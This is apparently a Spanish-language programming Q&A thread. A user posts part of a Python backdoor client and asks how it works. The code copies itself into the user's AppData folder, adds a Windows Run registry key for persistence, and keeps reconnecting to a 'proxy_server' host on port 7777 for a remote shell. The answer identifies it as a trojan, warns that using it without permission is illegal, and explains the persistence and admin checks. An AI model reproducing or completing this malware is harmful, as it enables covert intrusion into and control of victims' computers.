# duda con el metodo persistencia y root_check

Tags: python-3.x

```
# !/usr/bin/env python
# -*- coding: utf-8 -*-

#from servidor import *
import socket
import os
import subprocess
import base64
import requests
import mss
import time
import shutil
#import win32console
#import win32gui
import sys

class Cliente():
    def __init__(self):
        self.persistencia()
        self.connection()

    def persistencia(self):
        location = os.environ["appdata"] + r'\win_32.exe'
        if not os.path.exists(location):
            shutil.copyfile(sys.executable,location)
            subprocess.call(r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run     /v win_32 /t REG_SZ /d {}'.format(location),shell = True)

    def connection(self):
        self.cliente = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        while True:
            time.sleep(5)
            try:
                self.cliente.connect(('proxy_server', 7777))
                self.shell()
                self.cliente.close()
            except:
                self.connection()
            else:
                self.connection()

    def root_check(self):
        try:
            check = os.listdir(os.sep.join([os.environ.get("SystemRoot",r'C:\windows'),'temp']))
        except:
            self.admin = "\nNo eres usuario root."
        else:
            self.admin = "\nEres usuario root."

    def screenshot(self):
        screen = mss.mss()
        screen.shot()
```

No entiendo lo que sucede dentro del try del metodo root_check, como tampoco entiendo lo que pasa debajo del metodo persistencia justo despues de location = os.environ...(despues de ese igual no logro entender nada.)

No entiendo eso de appdata,systemroot,temp, nada de eso que esta dentro de os.environ.get.

Pdta: Disculpen la indentacion, subi esto desde el movil.

Answer (score 0, accepted):

### Environ

`os.environ` sirve para acceder al *entorno de ejecución* del programa.

Cuando lanzas un script python desde una *shell*, todas las variables de entorno definidas en esa *shell* están accesibles al programa a través de `os.environ()`.

Por ejemplo, imagina que lanzo un script desde bash de la siguiente forma (en Windows sería la misma idea, pero las variables de entorno se asignan de otro modo):

```
$ export MI_VARIABLE="Hola que tal"
$ python mi_script.py
```

Desde el código de `mi_script.py` puedo acceder al valor de la variable de entorno `MI_VARIABLE` en la forma siguiente:

```
valor = os.environ.get("MI_VARIABLE", None)
if valor:
   print(valor)
```

En realidad `os.environ` devuelve un diccionario Python, cuyas claves son todas las variables de entorno, por lo que también sería válido hacer:

```
print(os.environ["MI_VARIABLE"])
```

el problema de este segundo código es que si esa variable no existe en el entorno, el diccionario carecerá de esa clave, y el intento de acceder a ella generará  una excepción. En cambio usando `.get("MI_VARIABLE", None)` estamos suministrando un valor por defecto para el caso en que esa variable no exista (yo he puesto `None` pero puedes poner cualquier otro).

## Tu código

Respecto a lo que hace el resto del código, se trata de un troyano que instala una puerta trasera. La primera vez que arranca copia  el ejecutable en una cierta carpeta y modifica el registro windows para que vuelva a cargar este troyano cada vez que Windows se reinicie. Después abre una shell reversa conectándose a un proxy (o intentando hacerlo, reintentando cada 5 segundos). `root_check` verifica si el usuario que ejecuta el script tiene permisos de administrador. El estilo de programación es un tanto descuidado.

No voy a darte detalles de cómo funciona antes de saber para qué es esto. Instalar troyanos en máquinas de otros sin su permiso es ilegal.

### Más detalles (ampliación)

La variable de entorno `"appdata"` suele estar predefinida en Windows por el propio sistema y apunta a una carpeta (del usario que esté en ese momento logueado) en la que las aplicaciones almacenan sus datos (ej: donde los navegadores almacenan sus cachés, etc)

Puedes ver el valor de esta variable si abres una terminal Windows y pones:

```
echo %appdata%
C:\Users\abulafia\AppData\Roaming
```

Supongo que este script la usa para averiguar una carpeta que exista y en la que pueda escribir sin problemas (pues pertenece al usuario que está ejecutando el script).

Mediante `if not os.path.exists(location):` se evita volver a copiar el ejecutable si ya estaba allí. Por tanto sólo se copiará la primera vez. También, si es la primera vez que se ejecuta (lo que se detecta porque el troyano ya está copiado en su destino) se usa el comando  `reg add` para añadir al registro de sistema una clave. Esta clave en cuestión es para que el ejecutable copiado en appdata vuelva a cargarse cada vez que Windows arranque.

En cuanto a la variable de entorno `systemroot` es la que contiene el nombre de la carpeta en que Windows está instalado. Normalmente su valor es `C:\Windows`. Y de hecho este es el valor que el script toma por defecto si la variable no existe.

Lo único que tiene de especial esa carpeta es que está protegida para evitar que el usuario accidentalmente borre algún componente vital de Windows. Así que el script usa ese truco para saber si el usuario es admin. Simplemente intenta leer de `C:\Windows\temp` y si no lo consigue (porque se genera una excepción) es que no es administrador. Esa información la guarda, supongo que para mostrársela al hacker cuando entre mediante el shell remoto.

Comment: Es una backdoor, pero es con fines educativos, las pruebo en un entorno controlado, para nada deseo hacerle daños a otros.  Por otra parte, porque justo se envia el programa a esa ruta, acaso tiene algo en especial? tambien si te fijas, creo que la ruta (la que se define primeramente, ya tiene el ejecutable.exe, por lo que luego de hacer el shutil.copy esta deberia quedar asi,no?  -> blablabla\ejecutable.exe\ejecutable.exe. Cuando la ejecuto, veo la ruta y el ejecutable en la ruta solo esta una vez, estoy muy confundido.

Comment: Por ultimo, soy nuevo en windows, por lo que una explicacion (asi sea breve) de appdata, systemroot y temp me seria de ayuda. Sin mas gracias y que tengas buen dia.

Comment: Ok, he ampliado la respuesta. Mira a ver si esto resuelve tus dudas.